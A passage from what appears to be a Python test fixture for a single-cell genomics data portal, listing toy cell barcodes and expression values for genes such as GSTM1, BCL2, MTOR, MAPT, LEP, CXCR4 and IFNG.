2.81,
1.0,
1.0,
2.0,
1.0,
1.0,
3.0,
1.58,
2.0,
3.0,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"GSTM1 Cells": {
"name": "GSTM1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB8_BazMoo_3CCABBAABDCCBDCB-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB8_BazMoo_6DADBACAAACBDDAA-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"GSTM1 Expression": {
"name": "GSTM1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
2.0,
1.0,
1.58,
2.32,
2.81,
2.81,
2.81,
1.58,
2.0,
1.58,
2.81,
2.32,
2.58,
1.0,
3.0,
2.58,
2.32,
1.58,
3.0,
3.0,
1.0,
2.58,
2.81,
2.0,
2.0,
2.0,
2.81,
3.0,
2.58,
1.0,
2.32,
2.81,
2.0,
1.58,
1.58,
2.58,
2.58,
2.81,
2.58,
2.0,
2.0,
3.0,
1.0,
3.0,
2.32,
1.58,
2.81,
1.58,
1.0,
1.58,
2.32,
2.32,
3.0,
2.81,
1.0,
2.58,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BCL2 Cells": {
"name": "BCL2 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BCL2 Expression": {
"name": "BCL2 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.58,
2.58,
2.32,
2.58,
2.58,
2.81,
2.81,
1.58,
1.0,
1.58,
2.58,
2.81,
1.0,
2.32,
2.58,
1.0,
3.0,
1.0,
2.32,
1.58,
1.0,
2.58,
1.58,
2.81,
1.0,
2.32,
2.58,
1.58,
1.58,
1.0,
2.81,
1.0,
2.58,
2.32,
1.58,
3.0,
2.32,
1.0,
2.81,
1.0,
1.58,
1.58,
2.32,
3.0,
2.32,
2.58,
1.58,
2.58,
2.32,
1.0,
1.58,
2.58,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MTOR Cells": {
"name": "MTOR Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB3_BazMoo_6DDDCDCADCCDBCBB-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MTOR Expression": {
"name": "MTOR Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
2.0,
2.58,
2.0,
2.0,
2.0,
2.0,
2.81,
2.0,
1.58,
2.81,
1.58,
2.32,
2.32,
3.0,
1.58,
3.0,
2.32,
2.58,
2.58,
3.0,
1.58,
1.58,
2.32,
2.32,
2.32,
2.32,
1.58,
2.81,
2.0,
1.0,
1.0,
1.0,
1.0,
3.0,
1.58,
2.32,
1.58,
2.32,
2.0,
2.32,
1.58,
1.58,
1.58,
2.81,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MAPT Cells": {
"name": "MAPT Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MAPT Expression": {
"name": "MAPT Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.58,
2.81,
1.58,
2.81,
3.0,
3.0,
1.58,
2.0,
1.0,
2.0,
2.58,
3.0,
2.32,
1.0,
2.58,
2.0,
2.0,
2.81,
2.32,
2.0,
1.0,
2.0,
2.0,
2.32,
3.0,
2.32,
2.0,
2.32,
2.32,
2.81,
2.0,
2.0,
1.58,
1.58,
1.0,
3.0,
2.0,
1.0,
2.58,
2.0,
2.58,
1.0,
2.58,
2.58,
2.58,
2.81,
2.81,
2.32,
2.58,
3.0,
3.0,
2.0,
2.32,
1.0,
1.0,
2.0,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"LEP Cells": {
"name": "LEP Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB1_BazMoo_6ABAAADABDACDDDA-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"LEP Expression": {
"name": "LEP Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.32,
3.0,
2.58,
2.58,
2.0,
1.0,
1.58,
3.0,
2.81,
2.32,
3.0,
2.81,
2.32,
2.32,
2.81,
1.58,
2.0,
1.58,
2.81,
2.0,
2.81,
2.81,
1.0,
2.58,
1.58,
2.58,
1.58,
2.32,
3.0,
2.0,
1.0,
2.58,
2.81,
2.32,
3.0,
2.0,
2.0,
1.58,
1.58,
2.58,
2.58,
2.58,
2.0,
1.0,
2.0,
3.0,
2.32,
2.0,
2.81,
1.58,
2.0,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CXCR4 Cells": {
"name": "CXCR4 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB6_BazMoo_3CDCABAAADCACCBA-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB3_BazMoo_6DDDCDCADCCDBCBB-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CXCR4 Expression": {
"name": "CXCR4 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
2.32,
2.58,
2.0,
2.58,
2.0,
2.32,
1.58,
3.0,
2.81,
2.0,
2.81,
2.32,
2.58,
2.58,
1.58,
2.81,
1.58,
2.0,
2.81,
2.32,
3.0,
1.58,
2.81,
2.0,
2.81,
2.81,
2.58,
2.32,
2.58,
1.58,
2.0,
2.58,
2.58,
1.58,
2.0,
2.0,
3.0,
2.32,
1.0,
2.0,
1.0,
2.32,
2.81,
1.58,
1.0,
2.32,
2.58,
2.58,
2.58,
2.58,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IFNG Cells": {
"name": "IFNG Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB2_BazMoo_3BBCBAABCDAACADD-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
